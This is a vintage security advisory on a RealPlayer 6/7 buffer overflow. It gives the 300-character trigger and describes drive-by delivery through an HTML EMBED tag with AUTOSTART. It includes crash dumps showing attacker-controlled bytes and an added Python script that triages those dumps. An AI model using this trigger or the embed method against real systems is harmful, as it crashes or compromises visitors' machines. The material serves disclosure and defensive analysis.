COMMAND

    RealPlayer

SYSTEMS AFFECTED

    Win32 RealPlayer 6/7

PROBLEM

    Adam Muntner found the following.  There is a buffer overflow in the
    Win32 RealPlayer Basic client, versions 6 and 7.  It appears to occur
    when more than 299 characters are entered as a 'location' to play,
    such as http://aaaaa..... with 300 a's.  Adam has tested the MacOS
    and Linux RealPlayer clients and has as yet not found such a
    vulnerability in them.

    Using the HTML "EMBED" tag to embed RealPlayer in a web page and
    setting the "AUTOSTART=true" flag, you can force RealPlayer to start
    automatically, triggering the overflow condition.  While Adam has not
    taken the time to find the proper entry point in PNEN3260.DLL (which
    is the module that crashes, for example, in RealPlayer 6 Basic), it
    appears that arbitrary code could be executed simply by *VISITING* a
    web page carrying the malicious embedded RealPlayer tags (the
    following example uses RealPlayer v.6 Basic).

    For example, in RealPlayer Win32 version 6.0.7.380, type into
    "Location":

        http://aaaaaaaaaaa..... (300 a's)

        "This program has performed an illegal operation and will be shut down."
        REALPLAY caused an invalid page fault in
        module PNEN3260.DLL at 015f:6216d7ca.
        Registers:
        EAX=61616161 CS=015f EIP=6216d7ca EFLGS=00010202
        EBX=007c0158 SS=0167 ESP=00c6fe70 EBP=00c6fe88
        ECX=007c0350 DS=0167 ESI=007c0350 FS=629f
        EDX=00000001 ES=0167 EDI=007c0350 GS=0000
        Bytes at CS:EIP:
        ff 10 33 d2 f7 77 08 8b 47 04 8b 34 90 85 f6 8d
        Stack dump:
        007c0100 61616161 007c0350 007c0158 007c04d0 78009494 00c6fe9c
        6216d853 007c0100 007c0100 007c0100 00c6feac 6218407b 007c0100
        007c0100 00c6fed4

    Fun.  It looks like RealPlayer can be made to execute arbitrary code.
    It gets worse: using the HTML EMBED tag for RealPlayer you can force
    a web browser (MSIE in this case) to crash as well.  This is left as
    an exercise for the reader....

    Once RealPlayer is embedded in an HTML page, when Real crashes it
    takes Internet Explorer with it...

        "This program has performed an illegal operation and will be shut down"
        IEXPLORE caused an invalid page fault in
        module KERNEL32.DLL at 015f:bff7a379.
        Registers:
        EAX=61616161 CS=015f EIP=bff7a379 EFLGS=00010216
        EBX=084e5054 SS=0167 ESP=0058d840 EBP=0058d864
        ECX=61616161 DS=0167 ESI=000003b4 FS=5ac7
        EDX=084d0000 ES=0167 EDI=01615dac GS=0000
        Bytes at CS:EIP:
        89 41 08 8b 53 04 8b 43 08 89 50 04 8d 04 33 50
        Stack dump:
        01615dac 00000000 084d000c 084d0000 084e5054
        00000000 00000000 00009afb 000084e6 0058d88c
        bff7a541 084d0000 084e5054 000003b4 00000000
        00000001

    and the extra bonus of:

        "This program has performed an illegal operation and will be shut down"
        IEXPLORE caused an invalid page fault in
        module PNEN3260.DLL at 015f:621874ba.
        Registers:
        EAX=8004004e CS=015f EIP=621874ba EFLGS=00010202
        EBX=000000c8 SS=0167 ESP=067dfecc EBP=067dfed4
        ECX=08616860 DS=0167 ESI=086163e0 FS=3937
        EDX=61616161 ES=0167 EDI=8004004e GS=0000
        Bytes at CS:EIP:
        ff 52 08 8b c7 5f 5e 5d c2 10 00 90 90 90 90 90
        Stack dump:
        08616b90 085e69f0 067dfeec 6218893b 085034ec
        00400050 00400000 00400000 067dff04 621838b4
        08616b90 04606568 0000023c 086163e0 067dff38
        62183a47

    Load the malicious page enough times and you get a fun dialog  box
    that just won't go away... unless you reboot.

        "This program has performed an illegal operation and will be shut down"
        IEXPLORE caused an invalid page fault in
        module KERNEL32.DLL at 015f:bff87eb5.
        Registers:
        EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010206
        EBX=0288fb1c SS=0167 ESP=0284fff0 EBP=0285005c
        ECX=00000000 DS=0167 ESI=83b934e0 FS=2c0f
        EDX=83b934e8 ES=0167 EDI=00c1e79c GS=0000
        Bytes at CS:EIP:
        53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
        Stack dump:

    etc etc etc.
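    The dialogs above carry the information a triager needs to decide
    whether a crash is "just" a crash: which registers and stack slots
    ended up holding the fill bytes (0x61, 'a') from the over-long
    location.  The following helper is an added example, not code from
    this advisory or from RealNetworks; the function names
    (fill_dword, parse_crash_report, triage) are my own, and the two
    embedded dialogs are copied verbatim from the advisory so the
    script runs offline.

```python
"""Triage helper for the Windows 9x "invalid page fault" dialogs quoted in
this advisory.  Added example, not code from the advisory or RealNetworks:
it parses a pasted dialog and reports where the 0x61 ('a') fill bytes
from the over-long location landed."""
import re
from typing import Dict, List

# Registers whose contents matter for triage (names as printed in the dialogs)
GP_REGS = ("EAX", "EBX", "ECX", "EDX", "ESI", "EDI", "EBP", "ESP", "EIP")

HEADER_RE = re.compile(
    r"(?P<proc>\w+) caused an invalid page fault in\s+"
    r"module (?P<module>\S+) at (?P<seg>[0-9a-fA-F]{4}):(?P<off>[0-9a-fA-F]{8})"
)
REG_RE = re.compile(r"\b([A-Z]+)=([0-9a-fA-F]+)")
DWORD_RE = re.compile(r"\b[0-9a-fA-F]{8}\b")

# First dialog from the advisory (RealPlayer itself faulting)
REALPLAY_REPORT = """\
REALPLAY caused an invalid page fault in
module PNEN3260.DLL at 015f:6216d7ca.
Registers:
EAX=61616161 CS=015f EIP=6216d7ca EFLGS=00010202
EBX=007c0158 SS=0167 ESP=00c6fe70 EBP=00c6fe88
ECX=007c0350 DS=0167 ESI=007c0350 FS=629f
EDX=00000001 ES=0167 EDI=007c0350 GS=0000
Bytes at CS:EIP:
ff 10 33 d2 f7 77 08 8b 47 04 8b 34 90 85 f6 8d
Stack dump:
007c0100 61616161 007c0350 007c0158 007c04d0 78009494 00c6fe9c
6216d853 007c0100 007c0100 007c0100 00c6feac 6218407b 007c0100
007c0100 00c6fed4
"""

# Last dialog from the advisory (IE faulting later, with an empty stack dump)
IEXPLORE_REPORT = """\
IEXPLORE caused an invalid page fault in
module KERNEL32.DLL at 015f:bff87eb5.
Registers:
EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010206
EBX=0288fb1c SS=0167 ESP=0284fff0 EBP=0285005c
ECX=00000000 DS=0167 ESI=83b934e0 FS=2c0f
EDX=83b934e8 ES=0167 EDI=00c1e79c GS=0000
Bytes at CS:EIP:
53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
Stack dump:
"""


def fill_dword(ch: str) -> int:
    """Little-endian DWORD a register holds after loading 4 bytes of `ch`."""
    return int.from_bytes(ch.encode("latin-1") * 4, "little")


def parse_crash_report(text: str) -> Dict:
    """Split a pasted dialog into process, faulting module, registers and stack."""
    m = HEADER_RE.search(text)
    if not m:
        raise ValueError("not a Win9x 'invalid page fault' dialog")
    # Register lines sit between "Registers:" and "Bytes at CS:EIP:"
    reg_block = text.partition("Registers:")[2].partition("Bytes at CS:EIP:")[0]
    regs = {name: int(val, 16) for name, val in REG_RE.findall(reg_block)}
    # The stack dump may be empty, as in the advisory's last dialog
    stack_block = text.partition("Stack dump:")[2]
    stack: List[int] = [int(d, 16) for d in DWORD_RE.findall(stack_block)]
    return {
        "process": m["proc"],
        "module": m["module"],
        "fault_eip": int(m["off"], 16),
        "registers": regs,
        "stack": stack,
    }


def triage(report: Dict, fill_char: str = "a") -> Dict:
    """Report which registers and stack slots hold the fill pattern."""
    pattern = fill_dword(fill_char)
    regs = report["registers"]
    tainted = [r for r in GP_REGS if regs.get(r) == pattern]
    stack_hits = sum(1 for d in report["stack"] if d == pattern)
    if "EIP" in tainted:
        verdict = "EIP holds fill data: direct control of execution"
    elif tainted:
        verdict = "fill data reached registers used at the fault: memory corruption"
    else:
        verdict = "no fill pattern in registers: secondary or unrelated fault"
    return {"pattern": pattern, "tainted": tainted,
            "stack_hits": stack_hits, "verdict": verdict}


if __name__ == "__main__":
    for text in (REALPLAY_REPORT, IEXPLORE_REPORT):
        rep = parse_crash_report(text)
        res = triage(rep)
        print(f"{rep['process']} in {rep['module']} @ {rep['fault_eip']:08x}: "
              f"tainted={res['tainted']} stack_hits={res['stack_hits']} "
              f"-> {res['verdict']}")
```

    Run over the first dialog the script flags EAX and one stack slot;
    the "Bytes at CS:EIP" there begin with ff 10, which decodes to
    call dword ptr [eax], so the faulting instruction is an indirect
    call through a pointer that now reads 0x61616161.  That, rather
    than the crash itself, is why the advisory concludes the bug is
    more than a denial of service.  The last dialog has no fill bytes
    in any register and an empty stack dump, which the triage reports
    as a secondary fault rather than evidence of control.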

SOLUTION

    Vendor notified 3 April 2000, 10:00 AM MST via email.  A vendor
    patch is available...